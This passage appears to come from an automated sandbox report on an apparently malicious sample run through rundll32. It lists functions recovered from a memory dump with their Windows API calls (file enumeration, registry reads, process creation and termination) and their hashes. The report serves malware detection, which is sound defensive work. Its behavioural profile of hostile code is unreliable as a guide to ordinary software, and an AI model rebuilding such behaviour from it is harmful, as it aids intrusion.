                            • Part of subcall function 05B6D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,05B65546), ref: 05B6D6C0
                          • WaitForSingleObject.KERNEL32(?,00000064,?,05B8A2F4,76CDF750), ref: 05B7D4E1
                          • CloseHandle.KERNEL32(F0FFC983,?,05B8A2F4,76CDF750), ref: 05B7D508
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                          • String ID:
                          • API String ID: 3115907006-0
                          • Opcode ID: ac622017523a3470f75bca128bd725e15544c7bf04f713f22024d91446dd4e0f
                          • Instruction ID: 8a92e50d0c6365a62923298c7de96f2cf32cb4c8b656a937861c44d2bbb70b6e
                          • Opcode Fuzzy Hash: ac622017523a3470f75bca128bd725e15544c7bf04f713f22024d91446dd4e0f
                          • Instruction Fuzzy Hash: A3811871A00219EFDF11CFA4C984AADBBB5FF08384F158499E926AB250D731F941CBA0
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • FileTimeToLocalFileTime.KERNEL32(00000000,05B72702), ref: 05B7B2DA
                          • FileTimeToSystemTime.KERNEL32(05B72702,?), ref: 05B7B2E8
                          • lstrlenW.KERNEL32(00000010), ref: 05B7B2F8
                          • lstrlenW.KERNEL32(00000218), ref: 05B7B304
                          • FileTimeToLocalFileTime.KERNEL32(00000008,05B72702), ref: 05B7B3F1
                          • FileTimeToSystemTime.KERNEL32(05B72702,?), ref: 05B7B3FF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                          • String ID:
                          • API String ID: 1122361434-0
                          • Opcode ID: b58c80450a6d90e063d88fd5e31681885c8039c622a862d2b8deae529deb812f
                          • Instruction ID: 7ab7c523789d63d1e15381abece5c63a935c527b37f71d51abb420bbdc2d8cf9
                          • Opcode Fuzzy Hash: b58c80450a6d90e063d88fd5e31681885c8039c622a862d2b8deae529deb812f
                          • Instruction Fuzzy Hash: BE71CD71A0021EABCB50DFA9D884EFEB7F9FB08314F144466F515E7241EA38EA45DB60
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • RtlImageNtHeader.NTDLL(?), ref: 05B6E428
                            • Part of subcall function 05B77A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,05B6E448,?), ref: 05B77A6A
                            • Part of subcall function 05B77A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B77A7C
                            • Part of subcall function 05B77A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05B6E448,?), ref: 05B77A99
                            • Part of subcall function 05B77A3E: lstrlenW.KERNEL32(00000000,?,?,05B6E448,?), ref: 05B77AA5
                            • Part of subcall function 05B77A3E: HeapFree.KERNEL32(00000000,00000000,?,?,05B6E448,?), ref: 05B77AB9
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B6E460
                          • CloseHandle.KERNEL32(?), ref: 05B6E46E
                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 05B6E547
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B6E556
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 05B6E569
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                          • String ID:
                          • API String ID: 1719504581-0
                          • Opcode ID: ca49c815bbf5799d8bb766b502bebfc3d403341669e878f11c8b498208524713
                          • Instruction ID: 22e110442902b724c5b0c3cbc198b5c810cdca3ffaddee7e0e547a0896c4de48
                          • Opcode Fuzzy Hash: ca49c815bbf5799d8bb766b502bebfc3d403341669e878f11c8b498208524713
                          • Instruction Fuzzy Hash: CE416F3A600605ABDB219FA4D885EBE7F7AFB44710F1040A5F905AB250EB34FA55DB90
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,?), ref: 05B7D237
                          • GetLastError.KERNEL32 ref: 05B7D25D
                          • SetEvent.KERNEL32(00000000), ref: 05B7D270
                          • GetModuleHandleA.KERNEL32(00000000), ref: 05B7D2B9
                          • memset.NTDLL ref: 05B7D2CE
                          • RtlExitUserThread.NTDLL(?), ref: 05B7D303
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                          • String ID:
                          • API String ID: 3978817377-0
                          • Opcode ID: 18eba6c67d288c6ecebce423f4cb7257eecf2d3c520513c383aa3f2c7804140e
                          • Instruction ID: 3a01018f7abec60e69e3fdd42a97c67249c1a574d54037f16445401f53bea8c7
                          • Opcode Fuzzy Hash: 18eba6c67d288c6ecebce423f4cb7257eecf2d3c520513c383aa3f2c7804140e
                          • Instruction Fuzzy Hash: 10416A71900608AFCB209FA8D888CBEBBBAFF852517644599F817D3100DB31F945CB60
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c35f3531343eee632ec70d81ece8c1ebb1071a5c99a1b9aa84d55965590c06d2
                          • Instruction ID: 3dc9adabd3570e8851183f0a29627a29da1783decfb112ef64a6de431695af77
                          • Opcode Fuzzy Hash: c35f3531343eee632ec70d81ece8c1ebb1071a5c99a1b9aa84d55965590c06d2
                          • Instruction Fuzzy Hash: FB41C0B1604718EFC730AF64888992A7FAAFB44721B104A6DF67BC71C0EB70B445CB90
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                            • Part of subcall function 05B6AE7C: lstrlen.KERNEL32(05B6E448,00000000,00000000,?,?,05B77A5B,?,?,?,?,05B6E448,?), ref: 05B6AE8B
                            • Part of subcall function 05B6AE7C: mbstowcs.NTDLL ref: 05B6AEA7
                          • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 05B6EB0D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BB71
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?), ref: 05B7BBCC
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BBEF
                            • Part of subcall function 05B7BAD1: wcscpy.NTDLL ref: 05B7BC01
                          • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 05B6EB2E
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 05B6EB5A
                            • Part of subcall function 05B7BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05B7BC27
                            • Part of subcall function 05B7BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 05B7BC5D
                            • Part of subcall function 05B7BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 05B7BC79
                            • Part of subcall function 05B7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 05B7BC92
                            • Part of subcall function 05B7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 05B7BCA4
                            • Part of subcall function 05B7BAD1: FindClose.KERNEL32(?), ref: 05B7BCB9
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BCCD
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BCEF
                          • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 05B6EB77
                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 05B6EB98
                          • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 05B6EBAD
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                          • String ID:
                          • API String ID: 2670873185-0
                          • Opcode ID: fecd49ee4cf8da22ebdf943c6ca5cd62a384da8cdd1f81c5e70a0143707ad104
                          • Instruction ID: bb1b5398d316c88e4d6d9b3abbbb4e9d78c99dde64355d9f4cb812027c59b012
                          • Opcode Fuzzy Hash: fecd49ee4cf8da22ebdf943c6ca5cd62a384da8cdd1f81c5e70a0143707ad104
                          • Instruction Fuzzy Hash: 28312E76508205AFCB10AF64C8C987FBBEEFF88294F180969F59693110DB35F909DB52
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • lstrlen.KERNEL32(?,00000104,05B83A4E,00000000,?,?,05B79BAD,?,00000005,?,00000000), ref: 05B7EFBB
                          • lstrlen.KERNEL32(00000000,00000104,05B83A4E,00000000,?,?,05B79BAD,?,00000005), ref: 05B7EFD1
                          • lstrlen.KERNEL32(?,00000104,05B83A4E,00000000,?,?,05B79BAD,?,00000005), ref: 05B7EFE6
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B7F04B
                          • _snprintf.NTDLL ref: 05B7F071
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 05B7F090
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$AllocateFree_snprintf
                          • String ID:
                          • API String ID: 3180502281-0
                          • Opcode ID: 6b0ef65da86f0b20833afb0b0550c12af6343de1b28bc6900bdfd7c2defb9876
                          • Instruction ID: 074dc6e247c214485f50342d8cd28b4f7fd50f81b602c3be5ed56699252df5fa
                          • Opcode Fuzzy Hash: 6b0ef65da86f0b20833afb0b0550c12af6343de1b28bc6900bdfd7c2defb9876
                          • Instruction Fuzzy Hash: 4B319C3691021CFFCB20EFA4DC848BB7FAAFB44390B0194A6F925AB100D771B950DB90
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05B6A990
                          • CreateWaitableTimerA.KERNEL32(05B8A1E8,00000001,?), ref: 05B6A9AD
                          • GetLastError.KERNEL32(?,00000000,05B78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B6A9BE
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6A9FE
                          • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA1D
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05B78C06,00000000,00000000,0000801C), ref: 05B6AA33
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                          • String ID:
                          • API String ID: 1835239314-0
                          • Opcode ID: eebd6ac6a4f11bad8513ac2736dd976e6d3cd7fea3ac1dd7106dca3b1531edc4
                          • Instruction ID: ed9d5f568d73791b8fe0c9d11d91f29f5ae8bdf5ef90971388d678408520c343
                          • Opcode Fuzzy Hash: eebd6ac6a4f11bad8513ac2736dd976e6d3cd7fea3ac1dd7106dca3b1531edc4
                          • Instruction Fuzzy Hash: 8E312975910108FBCF21EF95C989CAEBFBAFB85750B2490A6F405B3140D634BA40CBA1
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,05B77C35,00000000,?,?,?), ref: 05B6F531
                          • StrChrA.SHLWAPI(00000001,00000020,?,?,?,05B77C35,00000000,?,?,?), ref: 05B6F542
                            • Part of subcall function 05B61F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,05B73D4E,00000000,?,?,00000000,00000001), ref: 05B61F21
                            • Part of subcall function 05B61F0F: StrChrA.SHLWAPI(?,0000000D,?,05B73D4E,00000000,?,?,00000000,00000001), ref: 05B61F59
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B6F582
                          • memcpy.NTDLL(00000000,?,00000007,?,?,?,05B77C35,00000000), ref: 05B6F5AF
                          • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,05B77C35,00000000), ref: 05B6F5BE
                          • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,05B77C35,00000000), ref: 05B6F5D0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy$AllocateHeaplstrlen
                          • String ID:
                          • API String ID: 1819133394-0
                          • Opcode ID: 2202e45d311eaa218290761e30635c09cf9606b6fb3eb0780e299d8275322767
                          • Instruction ID: 65c6a405b5219b4d9fade582aefb607d3a3feb92bd743b1c051a1702612e4039
                          • Opcode Fuzzy Hash: 2202e45d311eaa218290761e30635c09cf9606b6fb3eb0780e299d8275322767
                          • Instruction Fuzzy Hash: 27217C72600109BFDB109FA8DC85FAABBADEF04254F154092FA089B151EA74FD45CBA4
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 05B804D9
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B804EA
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 05B80505
                          • GetLastError.KERNEL32 ref: 05B8051B
                          • HeapFree.KERNEL32(00000000,?), ref: 05B8052D
                          • HeapFree.KERNEL32(00000000,?), ref: 05B80542
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                          • String ID:
                          • API String ID: 1822509305-0
                          • Opcode ID: 53811bf025fc7207a989dfaeeef92637b20cad438c87a951faad3ade54cb5502
                          • Instruction ID: 70edc33e49104a3beced5c9cece8015263f0ba60a82136d57e05a4a6c846dfc7
                          • Opcode Fuzzy Hash: 53811bf025fc7207a989dfaeeef92637b20cad438c87a951faad3ade54cb5502
                          • Instruction Fuzzy Hash: 9411307650101CFBCB216A95DC4DCFF7F7EEF452A0B101491F515A2150DA31AA59EBE0
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 05B7C917
                          • _strupr.NTDLL ref: 05B7C952
                          • lstrlen.KERNEL32(00000000), ref: 05B7C95A
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 05B7C999
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 05B7C9A0
                          • GetLastError.KERNEL32 ref: 05B7C9A8
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                          • String ID:
                          • API String ID: 110452925-0
                          • Opcode ID: 9bac6c44cfb5c32ce0978e99427e2ee6184bca2b1030b03279fead712e972ef0
                          • Instruction ID: 78b22f2abf83ebe6b9308c888a8dd420960ad1f5344255212fac3eda24e4966c
                          • Opcode Fuzzy Hash: 9bac6c44cfb5c32ce0978e99427e2ee6184bca2b1030b03279fead712e972ef0
                          • Instruction Fuzzy Hash: B3118272510208BFDB626B74DC89DBE7FAEEB88661B101459F917D3080EE75F884CB60
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,76CDF710), ref: 05B7B567
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 05B7B595
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05B7B5A7
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 05B7B5CC
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7B5E7
                          • RegCloseKey.ADVAPI32(?), ref: 05B7B5F1
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapQueryValue$AllocateCloseFreeOpen
                          • String ID:
                          • API String ID: 170146033-0
                          • Opcode ID: 10cd1d7a1e92ca21eff3d09adcbf1a010c248e96cb83919436d15cc704afda52
                          • Instruction ID: 0fc24800f6e7309ca324b3374edc5ce46158487abf12f6b95ca4044ecfdf1d0f
                          • Opcode Fuzzy Hash: 10cd1d7a1e92ca21eff3d09adcbf1a010c248e96cb83919436d15cc704afda52
                          • Instruction Fuzzy Hash: A711F476910008FFDB119B98DC85CFEBBBEFB48644B1050A6B911E3110EB31AA05EB20
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,05B68EF7,?,00000000,000000FF), ref: 05B6A5F8
                          • lstrlen.KERNEL32(?,?,?,?,05B68EF7,?,00000000,000000FF), ref: 05B6A5FF
                          • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 05B6A611
                          • _snprintf.NTDLL ref: 05B6A637
                            • Part of subcall function 05B7C01F: memset.NTDLL ref: 05B7C034
                            • Part of subcall function 05B7C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 05B7C06D
                            • Part of subcall function 05B7C01F: wcstombs.NTDLL ref: 05B7C077
                            • Part of subcall function 05B7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 05B7C0A8
                            • Part of subcall function 05B7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0D4
                            • Part of subcall function 05B7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 05B7C0EA
                            • Part of subcall function 05B7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0FE
                            • Part of subcall function 05B7C01F: CloseHandle.KERNEL32(?), ref: 05B7C131
                            • Part of subcall function 05B7C01F: CloseHandle.KERNEL32(?), ref: 05B7C136
                          • _snprintf.NTDLL ref: 05B6A66B
                            • Part of subcall function 05B7C01F: GetLastError.KERNEL32 ref: 05B7C102
                            • Part of subcall function 05B7C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 05B7C122
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 05B6A688
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                          • String ID:
                          • API String ID: 1481739438-0
                          • Opcode ID: 72e2bde36913e98a622098e7997089bf1cd0ebc9d61eb63b9ae03f06eb31b5e8
                          • Instruction ID: 8ad25efc9e27538c913fe90bdc85a5005b0e81570be80150acd528eb367e9ceb
                          • Opcode Fuzzy Hash: 72e2bde36913e98a622098e7997089bf1cd0ebc9d61eb63b9ae03f06eb31b5e8
                          • Instruction Fuzzy Hash: 0A117C72610218BFCB11AF64CC85DAE7F6AFB04360B155056FA09A7251DA35FA10DBA0
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • lstrlen.KERNEL32(05B6261E,00000000,00000000,00000008,00000000,?,05B6261E,05B6988B,00000000,?), ref: 05B7F7A7
                          • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 05B7F7BA
                          • lstrcpy.KERNEL32(00000008,05B6261E), ref: 05B7F7DC
                          • GetLastError.KERNEL32(05B64A0A,00000000,00000000,?,05B6261E,05B6988B,00000000,?), ref: 05B7F805
                          • HeapFree.KERNEL32(00000000,00000000,?,05B6261E,05B6988B,00000000,?), ref: 05B7F81D
                          • CloseHandle.KERNEL32(00000000,05B64A0A,00000000,00000000,?,05B6261E,05B6988B,00000000,?), ref: 05B7F826
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                          • String ID:
                          • API String ID: 2860611006-0
                          • Opcode ID: c64ea609046c2f0d254d07c1b16bb74df65ab2137cd3eb4f6422b32f37f9863d
                          • Instruction ID: 303f093e07f08e03690b536c3c34a17e4c171c8e7178b7a89f9a00c8c1de0da9
                          • Opcode Fuzzy Hash: c64ea609046c2f0d254d07c1b16bb74df65ab2137cd3eb4f6422b32f37f9863d
                          • Instruction Fuzzy Hash: 17117C7550424AEFCB109F64D8898BA7FAAFF0026471045AAF926D7250DB30BD45DBA4
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                          • GetCurrentThreadId.KERNEL32 ref: 05B750C4
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                          • lstrcpy.KERNEL32(00000000), ref: 05B75100
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                          • String ID:
                          • API String ID: 1175089793-0
                          • Opcode ID: 7a4ff55ae737e1d53fde673a3d4f777f58ef7d3a069acd496067432fc8425698
                          • Instruction ID: b6e45fef70f1973cc61e2a17eac92481e5346d619210fb882fed468235e414d7
                          • Opcode Fuzzy Hash: 7a4ff55ae737e1d53fde673a3d4f777f58ef7d3a069acd496067432fc8425698
                          • Instruction Fuzzy Hash: BE01A132A201197BD7309BA58C8AE7B3FADEF81A41B290495B916D3180EE70F800C7B0
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B64FB8
                          • lstrlen.KERNEL32(?,?), ref: 05B64FE9
                          • memcpy.NTDLL(00000008,?,00000001), ref: 05B64FF8
                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 05B6507A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrlenmemcpy
                          • String ID: W
                          • API String ID: 379260646-655174618
                          • Opcode ID: cce64acf448a866a8089eff3a83ba7691ea72db29bbaa8b495559a95ffa8c356
                          • Instruction ID: e1d54f437e6477bd9d2c7105320a7d522bcf78f51b740d3e6c0e9d263fa31ed0
                          • Opcode Fuzzy Hash: cce64acf448a866a8089eff3a83ba7691ea72db29bbaa8b495559a95ffa8c356
                          • Instruction Fuzzy Hash: 2741C530204A069FCF349F58D884BAA7BEAFB05314F5484AAE45ACB290C739F555CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B75A17
                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 05B75A84
                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 05B75A8E
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: BuffersErrorFileFlushLastmemset
                          • String ID: K$P
                          • API String ID: 3817869962-420285281
                          • Opcode ID: 1e0896518f4caf884080531de079277adfa49d12d04d83ad019f6d587bce140c
                          • Instruction ID: 13d3db92003281efaba1c9f05fa10224c67f453975896303f6e58f346e14d62b
                          • Opcode Fuzzy Hash: 1e0896518f4caf884080531de079277adfa49d12d04d83ad019f6d587bce140c
                          • Instruction Fuzzy Hash: 1B414D70A04B099FDB34CF64C984ABEBBF1FF44614F5489ADD4A693680D734B944CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memcpy.NTDLL(?,05B6DE40,00000000,?,?,?,05B6DE40,?,?,?,?,?), ref: 05B6D121
                          • lstrlen.KERNEL32(05B6DE40,?,?,?,05B6DE40,?,?,?,?,?), ref: 05B6D13F
                          • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 05B6D1AE
                          • lstrlen.KERNEL32(05B6DE40,00000000,00000000,?,?,?,05B6DE40,?,?,?,?,?), ref: 05B6D1CF
                          • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 05B6D1E3
                          • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 05B6D1EC
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 05B6D1FA
                          Memory Dump Source
